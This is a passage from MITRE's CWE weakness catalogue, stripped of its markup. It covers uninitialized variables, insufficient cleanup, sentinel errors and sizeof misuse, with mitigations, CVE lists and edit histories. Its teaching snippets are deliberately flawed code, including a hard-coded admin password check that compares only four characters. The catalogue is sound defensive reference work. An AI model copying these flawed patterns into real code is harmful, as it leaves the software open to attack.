test_string to an - acceptable default before the conditional: - - - char *test_string = "Done at the beginning"; - if (i != err_val) - { - test_string = "Hello World!"; - } - printf("%s", test_string); - - Another solution is to ensure that each - branch of the conditional - including the default/else - branch - could ensure that test_string is set: - - char *test_string; - if (i != err_val) - { - test_string = "Hello World!"; - } - else { - test_string = "Done on the other side!"; - } - printf("%s", test_string); - - - - - - CVE-2020-6078 - Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6078 - - - CVE-2009-2692 - Chain: Use of an unimplemented network socket operation pointing to an uninitialized handler function (CWE-456) causes a crash because of a null pointer dereference (CWE-476). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692 - - - CVE-2020-20739 - A variable that has its value set in a conditional statement is sometimes used when the conditional fails, sometimes causing data leakage - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20739 - - - CVE-2005-2978 - Product uses uninitialized variables for size and index, leading to resultant buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2978 - - - CVE-2005-2109 - Internal variable in PHP application is not initialized, allowing external modification. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2109 - - - CVE-2005-2193 - Array variable not initialized in PHP application, leading to resultant SQL injection. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2193 - - - - - Missing Initialization - - - SFP1 - Glitch in computation - - - ERR30-C - Set errno to zero before calling a library function known to set errno, and check errno only after the function returns a value indicating failure - CWE More Abstract - - - DCL04-PL - Always initialize local variables - Exact - - - DCL33-PL - Declare identifiers before using them - Imprecise - - - ASCSM-CWE-456 - - - ASCRM-CWE-456 - - - - - - - - - This weakness is a major factor in a number of resultant weaknesses, especially in web applications that allow global variable initialization (such as PHP) with libraries that can be directly requested. - It is highly likely that a large number of resultant weaknesses have missing initialization as a primary factor, but researcher reports generally do not provide this level of detail. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Applicable_Platforms, Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-06-21 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Name, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Observed_Examples, Relationships - - Missing Initialization - - - - The code uses a variable that has not been initialized, leading to unpredictable or unintended results. - In some languages such as C and C++, stack variables are not initialized by default. They generally contain junk data with the contents of stack memory before the function was invoked. An attacker can sometimes control or read these contents. In other languages or conditions, a variable that is not explicitly initialized can be given a default value that has security implications, depending on the logic of the program. The presence of an uninitialized variable can sometimes indicate a typographic error in the code. - - - - - - - - - - - - - - - Implementation - In C, using an uninitialized char * in some string libraries will return incorrect results, as the libraries expect the null terminator to always be at the end of a string, even if the string is empty. - - - High - - - Availability - Integrity - Other - Other - Initial variables usually contain junk, which can not be trusted for consistency. This can lead to denial of service conditions, or modify control flow in unexpected ways. In some cases, an attacker can "pre-initialize" the variable using previous actions, which might enable code execution. This can cause a race condition if a lock variable check passes when it should not. - - - Authorization - Other - Other - Strings that are not initialized are especially dangerous, since many functions expect a null at the end -- and only at the end -- of a string. - - - - - Implementation - Attack Surface Reduction - Assign all variables to an initial value. - - - Build and Compilation - Compilation or Build Hardening - Most compilers will complain about the use of uninitialized variables if warnings are turned on. - - - Implementation - Operation - When using a language that does not require explicit declaration of variables, run or compile the software in a mode that reports undeclared or unknown variables. This may indicate the presence of a typographic error in the variable's name. - - - Requirements - The choice could be made to use a language that is not susceptible to these issues. - - - Architecture and Design - Mitigating technologies such as safe string libraries and container abstractions could be introduced. - - - - - This code prints a greeting using information stored in a POST request: - - if (isset($_POST['names'])) {$nameArray = $_POST['names'];}echo "Hello " . $nameArray['first']; - - This code checks if the POST array 'names' is set before assigning it to the $nameArray variable. However, if the array is not in the POST request, $nameArray will remain uninitialized. This will cause an error when the array is accessed to print the greeting message, which could lead to further exploit. - - - The following switch statement is intended to set the values of the variables aN and bN before they are used: - - int aN, Bn;switch (ctl) { - case -1:aN = 0;bN = 0;break; - case 0:aN = i;bN = -i;break; - case 1:aN = i + NEXT_SZ;bN = i - NEXT_SZ;break; - default:aN = -1;aN = -1;break; - - }repaint(aN, bN); - - In the default case of the switch statement, the programmer has accidentally set the value of aN twice. As a result, bN will have an undefined value. Most uninitialized variable issues result in general software reliability problems, but if attackers can intentionally trigger the use of an uninitialized variable, they might be able to launch a denial of service attack by crashing the program. Under the right circumstances, an attacker may be able to control the value of an uninitialized variable by affecting the values on the stack prior to the invocation of the function. - - - This example will leave test_string in an - unknown condition when i is the same value as err_val, - because test_string is not initialized - (CWE-456). Depending on where this code segment appears - (e.g. within a function body), test_string might be - random if it is stored on the heap or stack. If the - variable is declared in static memory, it might be zero - or NULL. Compiler optimization might contribute to the - unpredictability of this address. - - char *test_string; - if (i != err_val) - { - test_string = "Hello World!"; - } - printf("%s", test_string); - - When the printf() is reached, - test_string might be an unexpected address, so the - printf might print junk strings (CWE-457). - - To fix this code, there are a couple approaches to - making sure that test_string has been properly set once - it reaches the printf(). - One solution would be to set test_string to an - acceptable default before the conditional: - - - char *test_string = "Done at the beginning"; - if (i != err_val) - { - test_string = "Hello World!"; - } - printf("%s", test_string); - - Another solution is to ensure that each - branch of the conditional - including the default/else - branch - could ensure that test_string is set: - - char *test_string; - if (i != err_val) - { - test_string = "Hello World!"; - } - else { - test_string = "Done on the other side!"; - } - printf("%s", test_string); - - - - - - CVE-2019-15900 - Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15900 - - - CVE-2008-3688 - Chain: A denial of service may be caused by an uninitialized variable (CWE-457) allowing an infinite loop (CWE-835) resulting from a connection to an unresponsive server. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688 - - - CVE-2008-0081 - Uninitialized variable leads to code execution in popular desktop application. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081 - - - CVE-2007-4682 - Crafted input triggers dereference of an uninitialized object pointer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4682 - - - CVE-2007-3468 - Crafted audio file triggers crash when an uninitialized variable is used. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3468 - - - CVE-2007-2728 - Uninitialized random seed variable used. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2728 - - - - - Uninitialized variable - - - Uninitialized Variable - - - SFP1 - Glitch in computation - - - DCL33-PL - Declare identifiers before using them - Imprecise - - - - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Description, Relationships, Observed_Example, Other_Notes, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms, Description, Other_Notes, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Modes_of_Introduction, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated References, Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - Uninitialized Variable - - - - This weakness has been deprecated because its name and description did not match. The description duplicated CWE-454, while the name suggested a more abstract initialization problem. Please refer to CWE-665 for the more abstract problem. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - Incorrect Initialization - - - - The software does not properly "clean up" and remove temporary or supporting resources after they have been used. - - - - - - - - - - Insufficient Cleanup - - - - - Architecture and Design - - - Implementation - - - - - Other - Confidentiality - Integrity - Other - Read Application Data - Modify Application Data - DoS: Resource Consumption (Other) - It is possible to overflow the number of temporary files because directories typically have limits on the number of files allowed. This could create a denial of service problem. - - - - - Architecture and Design - Implementation - Temporary files and other supporting resources should be deleted/released immediately after they are no longer needed. - - - - - Stream resources in a Java application should be released in a finally block, otherwise an exception thrown before the call to close() would result in an unreleased I/O resource. In the example below, the close() method is called in the try block (incorrect). - - try {InputStream is = new FileInputStream(path);byte b[] = new byte[is.available()];is.read(b);is.close();} catch (Throwable t) {log.error("Something bad happened: " + t.getMessage());} - - - - - - CVE-2000-0552 - World-readable temporary file not deleted after use. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0552 - - - CVE-2005-2293 - Temporary file not deleted after use, leaking database usernames and passwords. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2293 - - - CVE-2002-0788 - Interaction error creates a temporary file that can not be deleted due to strong permissions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0788 - - - CVE-2002-2066 - Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2066 - - - CVE-2002-2067 - Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2067 - - - CVE-2002-2068 - Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2068 - - - CVE-2002-2069 - Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2069 - - - CVE-2002-2070 - Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2070 - - - CVE-2005-1744 - Users not logged out when application is restarted after security-relevant changes were made. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1744 - - - - File Processing - - - - Incomplete Cleanup - - - A10 - Insecure Configuration Management - CWE More Specific - - - FIO42-C - Close files when they are no longer needed - CWE More Abstract - - - MEM31-C - Free dynamically allocated memory when no longer needed - CWE More Abstract - - - FIO04-J - Release resources when they are no longer needed - - - FIO00-J - Do not operate on files in shared directories - - - SFP14 - Failure to release resource - - - - CWE-459 is a child of CWE-404 because, while CWE-404 covers any type of improper shutdown or release of a resource, CWE-459 deals specifically with a multi-step shutdown process in which a crucial step for "proper" cleanup is omitted or impossible. That is, CWE-459 deals specifically with a cleanup or shutdown process that does not successfully remove all potentially sensitive data. - Overlaps other categories such as permissions and containment. Concept needs further development. This could be primary (e.g. leading to infoleak) or resultant (e.g. resulting from unhandled error conditions or early termination). - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Common_Consequences, Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - A software system that accepts path input in the form of trailing space ('filedir ') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - CVE-2001-0693 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0693 - - - CVE-2001-0778 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0778 - - - CVE-2001-1248 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1248 - - - CVE-2004-0280 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0280 - - - CVE-2004-2213 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2213 - - - CVE-2005-0622 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0622 - - - CVE-2005-1656 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1656 - - - CVE-2002-1603 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1603 - - - CVE-2001-0054 - Multi-Factor Vulnerability (MVF). directory traversal and other issues in FTP server using Web encodings such as "%20"; certain manipulations have unusual side effects. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0054 - - - CVE-2002-1451 - Trailing space ("+" in query string) leads to source code disclosure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1451 - - - - - Trailing Space - 'filedir ' - - - SFP16 - Path Traversal - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Path Issue - Trailing Space - 'filedir ' - - - - The product does not clean up its state or incorrectly cleans up its state when an exception is thrown, leading to unexpected state or control flow. - Often, when functions or loops become complicated, some level of resource cleanup is needed throughout execution. Exceptions can disturb the flow of the code and prevent the necessary cleanup from happening. - - - - - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Other - Varies by Context - The code could be left in a bad state. - - - - - Implementation - If one breaks from a loop or function by throwing an exception, make sure that cleanup happens or that you should exit the program. Use throwing exceptions sparsely. - - - - - The following example demonstrates the weakness. - - public class foo { - public static final void main( String args[] ) { - - boolean returnValue;returnValue=doStuff(); - }public static final boolean doStuff( ) { - - boolean threadLock;boolean truthvalue=true;try { - - while( - //check some condition - ) { - - threadLock=true; //do some stuff to truthvaluethreadLock=false; - } - }catch (Exception e){ - - System.err.println("You did something bad");if (something) return truthvalue; - }return truthvalue; - } - } - - In this case, you may leave a thread locked accidentally. - - - - - Improper cleanup on thrown exception - - - ERR03-J - Restore prior object state on method failure - - - ERR05-J - Do not let checked exceptions escape from a finally block - - - EXP31-PL - Do not suppress or ignore exceptions - Imprecise - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - Duplicate keys in associative lists can lead to non-unique keys being mistaken for an error. - A duplicate key entry -- if the alist is designed properly -- could be used as a constant time replace function. However, duplicate key entries could be inserted by mistake. Because of this ambiguity, duplicate key entries in an association list are not recommended and should not be allowed. - - - - - - - - - - - - Architecture and Design - - - Implementation - - - Low - - - Other - Quality Degradation - Varies by Context - - - - - Architecture and Design - Use a hash table instead of an alist. - - - Architecture and Design - Use an alist which checks the uniqueness of hash keys with each entry before inserting the entry. - - - - - The following code adds data to a list and then attempts to sort the data. - - alist = []while (foo()): #now assume there is a string data with a key basenamequeue.append(basename,data)queue.sort() - - - Since basename is not necessarily unique, this may not sort how one would like it to be. - - - - - Duplicate key in associative list (alist) - - - ENV02-C - Beware of multiple environment variables with the same effective name - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Demonstrative_Examples, Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - The accidental deletion of a data-structure sentinel can cause serious programming logic problems. - Often times data-structure sentinels are used to mark structure of the data structure. A common example of this is the null character at the end of strings. Another common example is linked lists which may contain a sentinel to mark the end of the list. It is dangerous to allow this type of control data to be easily accessible. Therefore, it is important to protect from the deletion or modification outside of some wrapper interface which provides safety. - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Availability - Other - Other - Generally this error will cause the data structure to not work properly. - - - Authorization - Other - Other - If a control character, such as NULL is removed, one may cause resource access control problems. - - - - - Architecture and Design - Use an abstraction library to abstract away risky APIs. Not a complete solution. - - - Build and Compilation - Compilation or Build Hardening - - Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows. - For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice. - - Defense in Depth - This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Operation - Use OS-level preventative functionality. Not a complete solution. - - - - - This example creates a null terminated string and prints it contents. - - char *foo;int counter;foo=calloc(sizeof(char)*10); - for (counter=0;counter!=10;counter++) {foo[counter]='a'; - printf("%s\n",foo);} - - The string foo has space for 9 characters and a null terminator, but 10 characters are written to it. As a result, the string foo is not null terminated and calling printf() on it will have unpredictable and possibly dangerous results. - - - - - Deletion of data-structure sentinel - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Demonstrative_Examples - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Deletion of Data-structure Sentinel - - - - The accidental addition of a data-structure sentinel can cause serious programming logic problems. - Data-structure sentinels are often used to mark the structure of data. A common example of this is the null character at the end of strings or a special sentinel to mark the end of a linked list. It is dangerous to allow this type of control data to be easily accessible. Therefore, it is important to protect from the addition or modification of sentinels. - - - - - - - - - - Architecture and Design - - - Implementation - - - High - - - Integrity - Modify Application Data - Generally this error will cause the data structure to not work properly by truncating the data. - - - - - Implementation - Architecture and Design - Encapsulate the user from interacting with data sentinels. Validate user input to verify that sentinels are not present. - - - Implementation - Proper error checking can reduce the risk of inadvertently introducing sentinel values into data. For example, if a parsing function fails or encounters an error, it might return a value that is the same as the sentinel. - - - Architecture and Design - Use an abstraction library to abstract away risky APIs. This is not a complete solution. - - - Operation - Use OS-level preventative functionality. This is not a complete solution. - - - - - The following example assigns some character values to a list of characters and prints them each individually, and then as a string. The third character value is intended to be an integer taken from user input and converted to an int. - - char *foo;foo=malloc(sizeof(char)*5);foo[0]='a';foo[1]='a';foo[2]=atoi(getc(stdin));foo[3]='c';foo[4]='\0'printf("%c %c %c %c %c \n",foo[0],foo[1],foo[2],foo[3],foo[4]);printf("%s\n",foo); - - The first print statement will print each character separated by a space. However, if a non-integer is read from stdin by getc, then atoi will not make a conversion and return 0. When foo is printed as a string, the 0 at character foo[2] will act as a NULL terminator and foo[3] will never be printed. - - - - - Addition of data-structure sentinel - - - STR03-C - Do not inadvertently truncate a null-terminated byte string - - - STR06-C - Do not assume that strtok() leaves the parse string unchanged - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Likelihood_of_Exploit, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Addition of Data-structure Sentinel - - - - A function can return a pointer to memory that is outside of the buffer that the pointer is expected to reference. - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Read Memory - Modify Memory - - - - - Illegal Pointer Value - - - SFP1 - Glitch in computation - - - - - - - - This entry should have a chaining relationship with CWE-119 instead of a parent / child relationship, however the focus of this weakness does not map cleanly to any existing entries in CWE. A new parent is being considered which covers the more generic problem of incorrect return values. There is also an abstract relationship to weaknesses in which one component sends incorrect messages to another component; in this case, one routine is sending an incorrect value to another. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - Illegal Pointer Value - - - - The code calls sizeof() on a malloced pointer type, which always returns the wordsize/8. This can produce an unexpected result if the programmer intended to determine how much memory has been allocated. - The use of sizeof() on a pointer can sometimes generate useful information. An obvious case is to find out the wordsize on a platform. More often than not, the appearance of sizeof(pointer) indicates a bug. - - - - - - - Primary - - - - - - - - - Implementation - - - High - - - Integrity - Confidentiality - Modify Memory - Read Memory - This error can often cause one to allocate a buffer that is much smaller than what is needed, leading to resultant weaknesses such as buffer overflows. - - - - - Implementation - Use expressions such as "sizeof(*pointer)" instead of "sizeof(pointer)", unless you intend to run sizeof() on a pointer type to gain some platform independence or if you are allocating a variable on the stack. - - - - - Care should be taken to ensure sizeof returns the size of the data structure itself, and not the size of the pointer to the data structure. - In this example, sizeof(foo) returns the size of the pointer. - - double *foo;...foo = (double *)malloc(sizeof(foo)); - - In this example, sizeof(*foo) returns the size of the data structure and not the size of the pointer. - - double *foo;...foo = (double *)malloc(sizeof(*foo)); - - - - This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded. - - - - /* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */ - - char *username = "admin";char *pass = "password"; - int AuthenticateUser(char *inUser, char *inPass) { - printf("Sizeof username = %d\n", sizeof(username));printf("Sizeof pass = %d\n", sizeof(pass)); - if (strncmp(username, inUser, sizeof(username))) {printf("Auth failure of username using sizeof\n");return(AUTH_FAIL);} - /* Because of CWE-467, the sizeof returns 4 on many platforms and architectures. */ - - if (! strncmp(pass, inPass, sizeof(pass))) {printf("Auth success of password using sizeof\n");return(AUTH_SUCCESS);}else {printf("Auth fail of password using sizeof\n");return(AUTH_FAIL);} - } - int main (int argc, char **argv){ - int authResult; - if (argc < 3) {ExitError("Usage: Provide a username and password");}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult != AUTH_SUCCESS) {ExitError("Authentication failed");}else {DoAuthenticatedTask(argv[1]);} - } - - In AuthenticateUser(), because sizeof() is applied to a parameter with an array type, the sizeof() call might return 4 on many modern architectures. As a result, the strncmp() call only checks the first four characters of the input password, resulting in a partial comparison (CWE-187), leading to improper authentication (CWE-287). - Because of the partial comparison, any of these passwords would still cause authentication to succeed for the "admin" user: - - pass5passABCDEFGHpassWORD - - Because only 4 characters are checked, this significantly reduces the search space for an attacker, making brute force attacks more feasible. - The same problem also applies to the username, so values such as "adminXYZ" and "administrator" will succeed for the username. - - - - - Use of sizeof() on a pointer type - - - 